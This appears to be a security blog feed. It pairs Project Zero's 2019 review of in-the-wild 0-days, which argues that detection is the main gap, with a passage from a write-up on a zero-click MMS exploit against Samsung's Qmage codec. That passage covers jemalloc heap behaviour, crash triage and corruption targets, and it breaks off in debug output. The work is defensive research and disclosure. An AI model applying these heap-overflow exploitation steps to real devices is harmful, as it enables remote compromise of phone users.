In May 2019, Project Zero released our tracking spreadsheet for 0-days used “in the wild” and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we’ve seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. In conjunction with this blog post, we are also publishing another blog post today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing 8 root cause analyses that we have done for in-the-wild 0-days from 2019. 
When I had the idea for this “Year in Review” blog post, I immediately started brainstorming the different ways we could slice the data and the different conclusions it may show. I thought that maybe there’d be interesting conclusions around why use-after-free is one of the most exploited bug classes or how a given exploitation method was used in Y% of 0-days or… but despite my attempts to find these interesting technical conclusions, over and over I kept coming back to the problem of the detection of 0-days. Through the variety of areas I explored, the data and analysis continued to highlight a single conclusion: As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can’t draw significant conclusions due to the lack of (and biases in) the data we have collected. 
The rest of the blog post will detail the analyses I did on 0-days exploited in 2019 that informed this conclusion. As a team, Project Zero will continue to research new detection methods for 0-days. We hope this post will convince you to work with us on this effort.
The Basics
In 2019, 20 0-days were detected and disclosed as exploited in the wild. This number, and our tracking, is scoped to targets and areas that Project Zero actively researches. You can read more about our scoping here. This is approximately the average for the years 2014-2017; 2018 had an uncharacteristically low number of detected 0-days. Please note that Project Zero only began tracking the data in July 2014 when the team was founded and so the numbers for 2014 have been doubled as an approximation.

The largely steady number of detected 0-days might suggest that defender detection techniques are progressing at the same speed as attacker techniques. That could be true. Or it could not be. The data in our spreadsheet are only the 0-day exploits that were detected, not the 0-day exploits that were used. As long as we still don’t know the true detection rate of all 0-day exploits, it’s very difficult to draw any conclusions about whether the number of 0-day exploits deployed in the wild is increasing or decreasing. For example, if all defenders stopped detection efforts, that could make it appear that there are no 0-days being exploited, but we’d clearly know that to be false.
All of the 0-day exploits detected in 2019 are detailed in the Project Zero tracking spreadsheet here.
0-days by Vendor
One of the common ways to analyze vulnerabilities and security issues is to look at who is affected. The breakdown of the 0-days exploited in 2019 by vendor is below. While the data shows us that almost all of the big platform vendors have at least a couple of 0-days detected against their products, there is a large disparity. Based on the data, it appears that Microsoft products are targeted about 5x more than Apple and Google products. Yet Apple and Google, with their iOS and Android products, make up a huge majority of devices in the world.
While Microsoft Windows has always been a prime target for actors exploiting 0-days, I think it’s more likely that we see more Microsoft 0-days due to detection bias. Because Microsoft has been a target since before some of the other platforms were even invented, there have been many more years of development into 0-day detection solutions for Microsoft products. Microsoft’s ecosystem also allows third parties, in addition to Microsoft itself, to deploy detection solutions for 0-days. More people looking for 0-days with varied detection methodologies means more 0-days will be found.

Microsoft Deep-Dive
For 2019, there were 11 0-day exploits detected in-the-wild in Microsoft products, more than 50% of all 0-days detected. Therefore, I think it’s worthwhile to dive into the Microsoft bugs to see what we can learn since it’s the only platform we have a decent sample size for.
Of the 11 Microsoft 0-days, only 4 were detected as exploiting the latest software release of Windows. All others targeted earlier releases of Windows, such as Windows 7, which was originally released in 2009. Of the 4 0-days that exploited the latest versions of Windows, 3 targeted Internet Explorer, which, while it’s not the default browser for Windows 10, is still included in the operating system for backwards compatibility. This means that 10/11 of the Microsoft vulnerabilities targeted legacy software.
Out of the 11 Microsoft 0-days, 6 targeted the Win32k component of the Windows operating system. Win32k is the kernel component responsible for the windows subsystem, and historically it has been a prime target for exploitation. However, with Windows 10, Microsoft dedicated resources to locking down the attack surface of win32k. Based on the data of detected 0-days, none of the 6 detected win32k exploits were detected as exploiting the latest Windows 10 software release. And 2 of the 0-days (CVE-2019-0808 and CVE-2019-1132) only affected Windows 7.
Even just within the Microsoft 0-days, there is likely detection bias. Is legacy software really the predominant target for 0-days in Microsoft Windows, or are we just better at detecting them since this software and these exploit techniques have been around the longest?
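CVE | Windows 7 SP1 | Windows 8.1 | Windows 10 | Win 10 1607 | Win 10 1703 | Win 10 1803 | Win 10 1809 | Win 10 1903 | Exploitation of Latest SW Release? | Component
CVE-2019-0676 | X | X | X | X | X | X | X |   | Yes (1809) | IE
CVE-2019-0808 | X |   |   |   |   |   |   |   | N/A (1809) | win32k
CVE-2019-0797 |   |   |   |   |   |   |   |   | Exploitation Unlikely (1809) | win32k
CVE-2019-0703 | X | X | X | X | X | X | X |   | Yes (1809) | Windows SMB
CVE-2019-0803 | X | X | X | X | X | X | X |   | Exp More Likely (1809) | win32k
CVE-2019-0859 | X | X | X | X | X | X | X |   | Exp More Likely (1809) | win32k
CVE-2019-0880 | X | X | X | X | X | X | X | X | Exp More Likely (1903) | splwow64
CVE-2019-1132 | X |   |   |   |   |   |   |   | N/A (1903) | win32k
CVE-2019-1367 | X | X | X | X | X | X | X | X | Yes (1903) | IE
CVE-2019-1429 | X |   | X | X | X | X | X | X | Yes (1903) | IE
CVE-2019-1458 | X | X | X | X |   |   |   |   | N/A (1909) | win32k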
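The counts quoted in this deep-dive can be re-derived from the last two columns of the table above. The Python sketch below is only an illustration: the tuples are transcribed by hand from the table, and the variable names are hypothetical rather than part of any Project Zero tooling.

```python
from collections import Counter

# (CVE, "Exploitation of Latest SW Release?" column, component),
# transcribed by hand from the table in the post.
MICROSOFT_0DAYS_2019 = [
    ("CVE-2019-0676", "Yes (1809)", "IE"),
    ("CVE-2019-0808", "N/A (1809)", "win32k"),
    ("CVE-2019-0797", "Exploitation Unlikely (1809)", "win32k"),
    ("CVE-2019-0703", "Yes (1809)", "Windows SMB"),
    ("CVE-2019-0803", "Exp More Likely (1809)", "win32k"),
    ("CVE-2019-0859", "Exp More Likely (1809)", "win32k"),
    ("CVE-2019-0880", "Exp More Likely (1903)", "splwow64"),
    ("CVE-2019-1132", "N/A (1903)", "win32k"),
    ("CVE-2019-1367", "Yes (1903)", "IE"),
    ("CVE-2019-1429", "Yes (1903)", "IE"),
    ("CVE-2019-1458", "N/A (1909)", "win32k"),
]

# Tally 0-days per component.
by_component = Counter(component for _, _, component in MICROSOFT_0DAYS_2019)

# Rows marked "Yes" were detected exploiting the latest software release.
latest = [row for row in MICROSOFT_0DAYS_2019 if row[1].startswith("Yes")]
latest_ie = [row for row in latest if row[2] == "IE"]

print("total:", len(MICROSOFT_0DAYS_2019))
print("win32k:", by_component["win32k"])
print("latest release exploited:", len(latest))
print("of which IE:", len(latest_ie))
```

Keeping the rows as plain tuples makes it easy to re-run the tally if the tracking spreadsheet is updated.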
Internet Explorer JScript 0-days CVE-2019-1367 and CVE-2019-1429
While this blog post’s goal is not to detail each 0-day used in 2019, we’d be remiss not to discuss the Internet Explorer JScript 0-days. CVE-2019-1367 and CVE-2019-1429 (and CVE-2018-8653 from Dec 2018 and CVE-2020-0674 from Feb 2020) are all variants of each other, with all 4 being exploited in the wild by the same actor according to Google’s Threat Analysis Group (TAG).
Our root cause analysis provides more details on these bugs, but we’ll summarize the points here. The bug class is a JScript variable not being tracked by the garbage collector. Multiple instances of this bug class were discovered in Jan 2018 by Ivan Fratric of Project Zero. In December 2018, Google's TAG discovered this bug class being used in the wild (CVE-2018-8653). Then in September 2019, another exploit using this bug class was found. This issue was “fixed” as CVE-2019-1367, but it turns out the patch didn’t actually fix the issue and the attackers were able to continue exploiting the original bug. At the same time, a variant was also found of the original bug by Ivan Fratric (P0 1947). Both the variant and the original bug were fixed as CVE-2019-1429. Then in January 2020, TAG found another exploit sample, because Microsoft’s patch was again incomplete. This issue was patched as CVE-2020-0674. 
A more thorough discussion on variant analysis and complete patches is due, but at this time we’ll simply note: The attackers who used the 0-day exploit had 4 separate chances to continue attacking users after the bug class and then particular bugs were known. If we as an industry want to make 0-day harder, we can’t give attackers four chances at the same bug.
Memory Corruption
63% of 2019’s exploited 0-day vulnerabilities fall under memory corruption, with half of those memory corruption bugs being use-after-free vulnerabilities. Memory corruption bugs and use-after-frees being a common target is nothing new. “Smashing the Stack for Fun and Profit”, the seminal work describing stack-based memory corruption, was published back in 1996. But it’s interesting to note that almost two-thirds of all detected 0-days are still exploiting memory corruption bugs when there’s been so much interesting security research into other classes of vulnerabilities, such as logic bugs and compiler bugs. Again, two-thirds of detected 0-days are memory corruption bugs. While I don’t know for certain that that proportion is false, we can't know either way because it's easier to detect memory corruption than other types of vulnerabilities. Due to the prevalence of memory corruption bugs and the fact that they tend to be less reliable than logic bugs, this could be another detection bias. Types of memory corruption bugs tend to be very similar within platforms and don’t really change over time: a use-after-free from a decade ago largely looks like a use-after-free bug today and so I think we may just be better at detecting these exploits. Logic and design bugs, on the other hand, rarely look the same because by their nature they take advantage of a specific flaw in the design of a specific component, which makes them more difficult to detect than standard memory corruption vulns.
Even if our data is biased to over-represent memory corruption vulnerabilities, memory corruption vulnerabilities are still being regularly exploited against users and thus we need to continue focusing on systemic and structural fixes such as memory tagging and memory safe languages.
More Thoughts on Detection
As we’ve discussed up to this point, the same questions posed in the team's original blog post still hold true: “What is the detection rate of 0-day exploits?” and “How many 0-day exploits are used without being detected?”.
We, as the security industry, are only able to review and analyze 0-days that were detected, not all 0-days that were used. While some might see this data and say that Microsoft Windows is exploited with 0-days 11x more often than Android, those claims cannot be made in good faith. Instead, I think the security community simply detects 0-days in Microsoft Windows at a much higher rate than any other platform. If we look back historically, the first anti-viruses and detections were built for Microsoft Windows rather than any other platform. As time has continued, the detection methods for Windows have continued to evolve. Both Microsoft and third party security companies build tools and techniques for detecting 0-days. We don’t see the same plethora of detection tools on other platforms, especially the mobile platforms, which means there’s less likelihood of detecting 0-days on those platforms too. An area for big growth is detecting 0-days on platforms other than Microsoft Windows and what level of access a vendor provides for detection.
Who is doing the detecting? Another interesting side of detection is that a single security researcher, Clément Lecigne of Google's TAG, is credited with 7 of the 20 detected 0-days in 2019 across 4 platforms: Apple iOS (CVE-2019-7286, CVE-2019-7287), Google Chrome (CVE-2019-5786), Microsoft Internet Explorer (CVE-2019-0676, CVE-2019-1367, CVE-2019-1429), and Microsoft Windows (CVE-2019-0808). Put another way, we would have detected roughly a third fewer of the 0-days actually used in the wild if it wasn’t for Clément and team. When we add in the entity with the second most, Kaspersky Lab, with 4 of the 0-days (CVE-2019-0797, CVE-2019-0859, CVE-2019-13720, CVE-2019-1458), that means that two entities are responsible for more than 50% of the 0-days detected in 2019. If two entities out of the entirety of the global security community are responsible for detecting more than half of the 0-days in a year, that’s a worrying sign for how we’re using our resources. The security community has a lot of growth to do in this area to have any confidence that we are detecting the majority of 0-day exploits that are used in the wild.
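The shares quoted above are simple ratios, and the short Python sketch below makes the arithmetic explicit. The CVE lists are copied from the paragraph above; the total of 20 is the figure given in The Basics, and the dictionary and variable names are purely illustrative.

```python
# Total detected 0-days for 2019, as stated in "The Basics".
TOTAL_DETECTED_2019 = 20

# Discovery credits as listed in the paragraph above.
credited = {
    "Clément Lecigne (Google TAG)": [
        "CVE-2019-7286", "CVE-2019-7287", "CVE-2019-5786", "CVE-2019-0676",
        "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-0808",
    ],
    "Kaspersky Lab": [
        "CVE-2019-0797", "CVE-2019-0859", "CVE-2019-13720", "CVE-2019-1458",
    ],
}

for name, cves in credited.items():
    share = len(cves) / TOTAL_DETECTED_2019
    print(f"{name}: {len(cves)}/{TOTAL_DETECTED_2019} ({share:.0%})")

combined = sum(len(cves) for cves in credited.values())
print(f"combined: {combined}/{TOTAL_DETECTED_2019} "
      f"({combined / TOTAL_DETECTED_2019:.0%})")
```

Whichever total is used as the denominator, 11 detections from two entities is still more than half of the year's count.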
Out of the 20 0-days, only one (CVE-2019-0703) included discovery credit to the vendor that was targeted, and even that one was also credited to an external researcher. To me, this is surprising because I’d expect that the vendor of a platform would be best positioned to detect 0-days with their access to the most telemetry data, logs, ability to build detections into the platform, “tips” about exploits, etc. This raises the question: are the vendor security teams that have the most access not putting resources towards detecting 0-days, or are they finding them and just not disclosing them when they are found internally? Either way, this is less than ideal. When you consider the locked down mobile platforms, this is especially worrisome since it’s so difficult for external researchers to get into those platforms and detect exploitation.
“Clandestine” 0-day reporting
Anecdotally, we know that sometimes vulnerabilities are reported surreptitiously, meaning that they are reported as just another bug, rather than a vulnerability that is being actively exploited. This hurts security because users and their enterprises may take different actions, based on their own unique threat models, if they knew a vulnerability was actively exploited. Vendors and third party security professionals could also create better detections, invest in related research, prioritize variant analysis, or take other actions that could directly make it more costly for the attacker to exploit additional vulnerabilities and users if they knew that attackers were already exploiting the bug. If everyone transparently disclosed when a vulnerability is exploited, our detection numbers would likely go up as well, and we would have better information about the current preferences and behaviors of attackers.
0-day Detection on Mobile Platforms
As mentioned above, an especially interesting and needed area for development is mobile platforms, iOS and Android. In 2019, there were only 3 detected 0-days for all of mobile: 2 for iOS (CVE-2019-7286 and CVE-2019-7287) and 1 for Android (CVE-2019-2215). However, there are billions of mobile phone users and Android and iOS exploits sell for double or more compared to an equivalent desktop exploit according to Zerodium. We know that these exploits are being developed and used, we’re just not finding them. The mobile platforms, iOS and Android, are likely two of the toughest platforms for third party security solutions to deploy upon due to the “walled garden” of iOS and the application sandboxes of both platforms. The same features that are critical for user security also make it difficult for third parties to deploy on-device detection solutions. Since it’s so difficult for non-vendors to deploy solutions, we as users and the security community, rely on the vendors to be active and transparent in hunting 0-days targeting these platforms. Therefore a crucial question becomes, how do we as fellow security professionals incentivize the vendors to prioritize this?
Another interesting artifact that appeared when doing the analysis is that CVE-2019-2215 is the first detected 0-day targeting Android since we started tracking 0-days. Up until that point, the closest was CVE-2016-5195, which targeted Linux. Yet even CVE-2019-2215, the only Android 0-day found in 2019 (and since 2014), was detected through documents rather than by finding a zero-day exploit sample. Therefore, no Android 0-day exploit samples were detected (or, at least, publicly disclosed) in all of 2019, 2018, 2017, 2016, 2015, and half of 2014. Based on knowledge of the offensive security industry, we know that that doesn’t mean none were used. Instead it means we aren’t detecting well enough and 0-days are being exploited without public knowledge. Therefore, those 0-days go unpatched and users and the security community are unable to take additional defensive actions. Researching new methodologies for detecting 0-days targeting mobile platforms, iOS and Android, is a focus for Project Zero in 2020.
Detection on Other Platforms
It’s interesting to note that other popular platforms, like Linux, Safari, or macOS, had no 0-days detected over the same period. While no 0-days have been publicly detected in these products, we can have confidence that they are still targets of interest, based on the number of users they have, job requisitions for offensive positions seeking these skills, and even conversations with offensive security researchers. If Trend Micro’s OfficeScan is worth targeting, then so are the other much more prevalent products. If that’s the case, then again it leads us back to detection. We should also keep in mind though that some platforms may not need 0-days for successful exploitation. For example, this blogpost details how iOS exploit chains used publicly known n-days to exploit WebKit. But without more complete data, we can’t make confident determinations of how much 0-day exploitation is occurring per platform.
Conclusion
Here’s our first Year in Review of 0-days exploited in the wild. As this program evolves, so will what we publish based on feedback from you and as our own knowledge and experience continues to grow. We started this effort with the assumption of finding a multitude of different conclusions, primarily “technical”, but once the analysis began, it became clear that everything came back to a single conclusion: we have a big gap in detecting 0-day exploits. Project Zero is committed to continuing to research new detection methodologies for 0-day exploits and sharing that knowledge with the world.
Along with publishing this Year in Review today, we’re also publishing the root cause analyses that we completed, which were used to draw our conclusions. Please check out the blog post if you’re interested in more details about the different 0-days exploited in the wild in 2019. 
Category: Hacking & Security

MMS Exploit Part 3: Constructing the Memory Corruption Primitives

28 July, 2020 - 21:50
Posted by Mateusz Jurczyk, Project Zero
This post is the third of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.
Introduction
In Part 2, I discussed how I managed to fuzz-test the Qmage codec on Google infrastructure at the turn of 2019/2020. It led to the discovery of a huge number of unique crashes, many of which manifested obvious memory corruption problems. After reporting them to Samsung on 28 January 2020, my attention turned to the idea of using some of the vulnerabilities to write an MMS exploit. There was evidence that the Samsung Messages app processed incoming bitmaps without any user interaction, so this seemed like the perfect opportunity to see just how realistic such an attack could be with a wide range of image parsing bugs to choose from. The prospect of developing a zero-click exploit running over the mobile network was new and thrilling to me, and it got me very excited to take on the challenge.
The first step in the process was to identify the crashes that were not just high severity on paper, but were also the most convenient for exploitation in a real-life scenario. An ideal bug would be easy to work with (i.e. require a relatively simple structure of the Qmage file), and would provide full control over the memory corruption condition. In case of a heap buffer overflow, this would imply control over the allocation size, overflow size, overflow data, and possibly even the overflow offset (in a non-linear case). Such a bug would lay a strong foundation for any higher-order mechanisms that would have to be implemented in the exploit.
This blog post describes the additional crash triage I performed to find the most suitable bug for exploitation, followed by an analysis of how it was used to turn plain memory corruption into more useful primitives: control over the instruction pointer (PC), and the ability to "probe" the existence of memory ranges. In practice, I was simultaneously experimenting with the MMS protocol to get an initial feel of its design, capabilities and limitations. However, for the sake of clarity, I will limit the scope of this write-up to the low level exploitation details, and proceed to link the memory corruption with the MMS delivery channel in future posts. Let's get started!
Heap fundamentals in Android
The first observation to make is that a great majority of the identified crashes were heap-oriented. There were some instances of stack buffer overflows, but the stack cookie mitigation rendered them non-exploitable. There were also other cases such as reads from uninitialized stack-based pointers, but they didn't seem particularly useful, so in the end, I decided to focus on the 174 "write" crashes, all of which referenced out-of-bounds heap addresses. In principle, such bugs tend to provide the most flexibility in exploitation, as they can be used to corrupt a variety of objects in memory. So, if we are going to work with the Android heap, we should get familiar with the underlying allocator and its security properties.
The allocator currently used in all modern versions of Android is jemalloc (side note: this is going to change with the introduction of Scudo in Android 11). There were two main resources that I found especially useful when learning and experimenting with jemalloc:
  • "The Shadow over Android: Heap exploitation assistance for Android’s libc allocator" at INFILTRATE 2017 (slides) and the shadow exploitation framework itself (GitHub).
  • "A Tale of Two Mallocs: On Android libc Allocators" at INFILTRATE 2018 (video), and the accompanying blog post series (specifically part 2).

I won't go into much detail regarding the internals of the allocator (you can find them in the above sources), but I would like to highlight the following properties that are most relevant to this research:
  • Determinism: jemalloc behaves deterministically, at least to the extent observable by the attacker. For example, with a clean state of the heap, two subsequent allocations of the same size are positioned next to each other.
  • Lack of inline metadata: metadata is stored separately from the allocation itself, so an overflow of one chunk (or "region", as it's called in jemalloc) immediately overwrites the data of the adjacent one, with no metadata in between.
  • Division into size classes: allocations are grouped by size, so any two allocations can only be adjacent to each other if they fall into the same size "bin".
  • Thread caches: a mechanism called "tcaches" improves locality by quickly reusing recently freed regions. This guarantees the predictability of some allocation patterns – for example, a malloc → free → malloc sequence of the same length will return the same address twice.
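To make these properties concrete, here is a deliberately simplified Python model of an allocator with size-class bins and a LIFO cache of freed regions. It is a toy written for illustration and is not jemalloc: the size classes, base address, run size, and the ToyBinAllocator name are all assumptions, and real jemalloc is considerably more complex.

```python
class ToyBinAllocator:
    """Toy model of size-class bins plus a LIFO free cache. Not jemalloc."""

    # Hypothetical subset of small size classes, chosen for illustration.
    SIZE_CLASSES = (16, 32, 48, 64, 80, 96, 112, 128)

    def __init__(self, base=0x10000, run_size=0x1000):
        # Each size class carves regions out of its own contiguous run.
        # (No bounds checking on runs: this is only a toy.)
        self.next_free = {
            sc: base + i * run_size for i, sc in enumerate(self.SIZE_CLASSES)
        }
        self.cache = {sc: [] for sc in self.SIZE_CLASSES}
        self.live = {}  # address -> size class of the live region

    def _size_class(self, size):
        for sc in self.SIZE_CLASSES:
            if size <= sc:
                return sc
        raise ValueError("size too large for this toy model")

    def malloc(self, size):
        sc = self._size_class(size)
        if self.cache[sc]:
            # Reuse the most recently freed region of this size class.
            addr = self.cache[sc].pop()
        else:
            # Otherwise hand out the next region in the run, with no
            # inline metadata between neighbouring regions.
            addr = self.next_free[sc]
            self.next_free[sc] += sc
        self.live[addr] = sc
        return addr

    def free(self, addr):
        sc = self.live.pop(addr)
        self.cache[sc].append(addr)


heap = ToyBinAllocator()
a = heap.malloc(100)   # rounds up to the 112-byte class
b = heap.malloc(100)   # same class: placed directly after a
c = heap.malloc(20)    # different class: lives in a different run
heap.free(b)
d = heap.malloc(100)   # malloc -> free -> malloc returns b's address again

print(hex(a), hex(b), hex(c), hex(d))
```

In this model an overflow out of `a` lands directly in `b`, while `c` can never be adjacent to either of them, which is the intuition behind the working assumption used in the rest of the post.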

These characteristics can be favorable or disadvantageous depending on the specific bug and context around it. Overall, in this case, I think these properties added up to a "net positive" from the attacker's perspective, which is not great for user security. For this reason, I am really looking forward to seeing the hardened Scudo allocator enabled by default in Android 11.
Now that we have some background on the behavior we can expect from jemalloc, it's time to analyze the write-violation crashes in search of the most promising ones.
Finding the right bug
With all that we know about jemalloc, we can make a working assumption that if there are two malloc calls, and they can be made to be of a similar size, the second one can be corrupted by the first one with a forward overflow, because it is (usually) placed at a higher address. So in order to assess the usability of a crash, we need to determine:
  • What region is overwritten by the bug?
  • What are the other allocations that are requested between the overwritten allocation and the overflow, and are used after the overflow?

The SkCodecFuzzer test harness has an -l flag that enables the logging of all mallocs and frees to stderr at runtime. It can be used to match the address of the invalid memory access with the corresponding allocation, and see what other allocations are made in between. For example, if we take the signal_sigsegv_40064924d0_4336_c77562cdc52d1baed45ff05bc9ae2023.qmg sample and run it through the loader with the -l flag, we should see the following output (malloc stack traces were edited out for brevity):
[...]
[+] Detected image characteristics:
[+] Dimensions:      148 x 192
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
[DEBUG] malloc(    113664) = {0x408c0ff400 .. 0x408c11b000}
[DEBUG] malloc(       104) = {0x408c11cf98 .. 0x408c11d000}
[DEBUG] malloc(     28416) = {0x408c11e100 .. 0x408c125000}
[DEBUG] malloc(        22) = {0x408c126fea .. 0x408c127000}
[DEBUG] malloc(      4120) = {0x408c128fe8 .. 0x408c12a000}
ASAN:SIGSEGV
=================================================================
==212100==ERROR: AddressSanitizer: SEGV on unknown address 0x408c125000 (pc 0x400396c4d0 sp 0x4000d04c90 bp 0x4000d04c90 T0)
    #0 0x002b54d0 in (QuramQmageGrayIndexRleDecode+0xdc)
    #1 0x0029d584 in (__QM_WCodec_decode+0xa3c)
    #2 0x0029c9b4 in (Qmage_WDecodeFrame_Low_Rev14474_20150224+0x144)
    #3 0x0029ae7c in (QuramQmageDecodeFrame_Rev14474_20150224+0xa8)
[...]
Here, the invalid 0x408c125000 address is the same as the end of the third allocation requested after printing out the image characteristics. Its size of 28416 bytes coincides with 148 (width) × 192 (height), so we can presume that it is a pixel storage buffer and therefore has controlled length. There are two more allocations (of 22 and 4120 bytes) made after the overflown buffer and kept alive until the crash, so each of them could be the target of the memory corruption. In the call stack, we can also see that the problem occurs during RLE decoding, which is a well-known algorithm and thus would probably meet our criteria of being easy to work with. This is how a specific crash can be evaluated for exploitability.
Since I wished to explore the whole range of options and manually performing the same analysis on the other 173 unique "write" crashes seemed tedious, I wrote a quick bash script to generate and process the crash logs to match the invalidly accessed addresses with the corresponding heap regions. After sorting and deduplicating, they added up to a total of 23 unique overwritten allocation sites. I was not particularly interested in QMv1 crashes (the old format wasn't correctly handled by the Messages application), so I filtered them out from the results, leaving me with 17 allocations subject to overflow. That was a much more manageable number of cases to go through by hand.
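The matching step can be sketched in a few lines. The snippet below is not the bash script mentioned above; it is a hypothetical Python illustration that parses the log format shown earlier and picks the allocation whose end lies closest at or below the faulting address. That heuristic assumes a forward overflow, and the sketch ignores free() records, which the excerpt in the post does not show.

```python
import re

# Patterns for the harness log lines shown in the post.
MALLOC_RE = re.compile(
    r"\[DEBUG\] malloc\(\s*(\d+)\) = \{(0x[0-9a-fA-F]+) \.\. (0x[0-9a-fA-F]+)\}"
)
FAULT_RE = re.compile(r"SEGV on unknown address (0x[0-9a-fA-F]+)")

SAMPLE_LOG = """\
[DEBUG] malloc(    113664) = {0x408c0ff400 .. 0x408c11b000}
[DEBUG] malloc(       104) = {0x408c11cf98 .. 0x408c11d000}
[DEBUG] malloc(     28416) = {0x408c11e100 .. 0x408c125000}
[DEBUG] malloc(        22) = {0x408c126fea .. 0x408c127000}
[DEBUG] malloc(      4120) = {0x408c128fe8 .. 0x408c12a000}
==212100==ERROR: AddressSanitizer: SEGV on unknown address 0x408c125000 (pc 0x400396c4d0 sp 0x4000d04c90 bp 0x4000d04c90 T0)
"""


def find_overflown_region(log_text):
    """Guess which logged allocation was overflown (forward overflow assumed)."""
    allocations = [
        (int(size), int(start, 16), int(end, 16))
        for size, start, end in MALLOC_RE.findall(log_text)
    ]
    fault = FAULT_RE.search(log_text)
    if fault is None or not allocations:
        return None
    fault_addr = int(fault.group(1), 16)

    # Candidates end at or below the faulting address; take the closest one.
    candidates = [
        (index, alloc) for index, alloc in enumerate(allocations)
        if alloc[2] <= fault_addr
    ]
    if not candidates:
        return None
    index, (size, start, end) = max(candidates, key=lambda item: item[1][2])
    return {
        "ordinal": index + 1,                      # 1-based position in the log
        "size": size,
        "start": start,
        "end": end,
        "later_sizes": [a[0] for a in allocations[index + 1:]],
    }


region = find_overflown_region(SAMPLE_LOG)
print(region)
```

For the sample above, the selected region is the 28416-byte buffer, and `later_sizes` lists the allocations that were requested afterwards and are therefore potential corruption targets.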
After a brief analysis, I concluded that many of them were not optimal for my exploit, because they were temporary buffers, allocated and immediately overflown without any mallocs taking place in between. Taking advantage of such a bug would require an earlier allocation to be mapped above the buffer – a heap state that is possible, but harder to reliably achieve with the limited heap manipulation capabilities of the image codec. The remaining allocation sites that had some potential could be divided into four major groups:
Option 1: The pixel storage buffer associated with the Bitmap object, which is the #1 malloc made by the harness after parsing the headers
Example crash ID: e9e773f3e0a6d155636a52a5418d9160
Size: Controlled through the bitmap dimensions
Allocated in: SkBitmap::tryAllocPixels
Overflown by:
  • QuramQumageDecoder8bit
  • QuramQumageDecoder32bit24bit
  • QuramQmageGrayIndexRleDecode
  • qme_inflate_fast (via PVcodecDecoder_zip)
Potential corruption targets: The android::Bitmap object allocated directly after, and any further allocation made by the specific codec (depending on which one is used to trigger the overflow)
Option 2: A temporary output storage buffer, which is the #3 malloc made by the harness after parsing the headers (preceded only by the bitmap object allocation), and the first allocation in the getAndroidPixels call
Example crash ID: b0749f475f0b7af444625c3d1c3a5be8
Size: Controlled through the bitmap dimensions
Allocated in: QuramQmageDecodeFrame_Rev14474_20150224
Overflown by:
  • QuramQumageDecoder8bit
  • QuramQmageGrayIndexRleDecode
Potential corruption targets:
  • The decoding context structure of size 1688 allocated at the beginning of QuramQumageDecoder8bit, as well as any of the numerous other allocations in that function
  • The RLE decoding context structure of size 4120 allocated in QuramQmageGrayIndexRleDecode

Option 3: A temporary RLE decoding buffer
Example crash ID: 03f2d8074d5797537e8c615b2fa53cef
Size: Controlled 32-bit integer from the input stream
Allocated in:
  • QmageDecodeStreamGet
  • QmageDecodeStreamGet_Rev11454_141008
  • QmageRleDecode
Overflown by:
  • QmageDecodeStreamGet
  • QmageDecodeStreamGet_Rev11454_141008
  • QmageRleDecode
Potential corruption targets: The RLE decoding context structure of size 4120
Option 4: A temporary zlib decoding buffer
Example crash ID: cbd3dbc9e71b2fec9606eaa3eafce056
Size: Controlled through the bitmap dimensions
Allocated in: QuramQumageDecoder32bit24bit
Overflown by: qme_inflate (as called by QuramQumageDecoder32bit24bit → DecodePrediction2dZip → PVcodecDecoder_zip → qme_uncompress)
Potential corruption targets: The zlib decoding context structure of size 12928
After some consideration, I decided that option 1 (bitmap pixel buffer) was the most promising one, because:
  • It was the earliest overflown malloc, making it possible to corrupt the widest range of subsequently allocated objects, including the Bitmap object.
  • The size was controlled, and in the case of RLE and zlib decompression, the overflow length and data were controlled too. On top of that, I was familiar with both algorithms and thus didn't anticipate any problems constructing the exploit files.

To be specific, I started my experimentation with the e418c0496cb1babf0eba13026f4d1504 crash and the signal_sigsegv_4005d89b74_8686_6eea0420198397cc5c97563bceb04424.qmg sample. It generated the following report (malloc stack traces again edited out):
[...]
[+] Detected image characteristics:
[+] Dimensions:      40 x 7
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
malloc(      1120) = {0x408c13bba0 .. 0x408c13c000}
malloc(       104) = {0x408c13df98 .. 0x408c13e000}
malloc(        24) = {0x408c13ffe8 .. 0x408c140000}
malloc(      4120) = {0x408c141fe8 .. 0x408c143000}
ASAN:SIGSEGV
=================================================================
==3746114==ERROR: AddressSanitizer: SEGV on unknown address 0x408c13c000 (pc 0x40071feb74 sp 0x4000d0b1f0 bp 0x4000d0b1f0 T0)
    #0 0x00249b74 in (QuramQmageGrayIndexRleDecode+0xd8)
    #1 0x002309d8 in (PVcodecDecoderIndex+0x110)
    #2 0x00230854 in (__QM_WCodec_decode+0xe4)
    #3 0x00230544 in (Qmage_WDecodeFrame_Low+0x198)
    #4 0x0022c604 in (QuramQmageDecodeFrame+0x78)
[...]
Here, we are overflowing the 1120-byte buffer (width × height × bpp; 40 × 7 × 4 = 1120), and can corrupt the three subsequent ones marked in red. The first (104 bytes) is the Bitmap structure, the second (24 bytes) is the RLE-compressed input stream, and the third (4120 bytes) is the RLE decoder context structure. The Bitmap object sounds the most useful, and since I have already mentioned it so many times, let's finally look into it to see how it works! We'll be operating on the assumption that if we adjust the Qmage dimensions such that the pixel buffer consumes 104 bytes (e.g. 13x2), then the two allocations will likely be adjacent on Android, giving us full (linear) control over the second region.
Enter the Android Bitmap object
First of all, it is important to note that the Bitmap object created by our test harness is not exactly the same as the one used in Android, because of a difference in the allocator objects used (SkBitmap::HeapAllocator vs GraphicsJNI's HeapAllocator). This is irrelevant for fuzzing, but makes a big difference in exploit development. In order to learn about the actual object being allocated on Android, we can use a simple Frida script that hooks the heap-related functions and logs all of their invocations with stack trace. If we attach it to the process and send an MMS with the proof-of-concept image, we should see output similar to the following (I demangled some symbols and edited out argument definitions for brevity):
[10036] calloc(1120, 1) => 0x7bc1e95900
    0x7cbba83684!android::Bitmap::allocateHeapBitmap+0x34
    0x7cbba88b54!android::Bitmap::allocateHeapBitmap+0x9c
    0x7cbd827178!HeapAllocator::allocPixelRef+0x28
    0x7cbbd1ae80!SkBitmap::tryAllocPixels+0x50
    0x7cbd820ae8!0x187ae8
    0x7cbd81fc8c!0x186c8c
    0x70a04ff0 boot-framework.oat!0x2bbff0
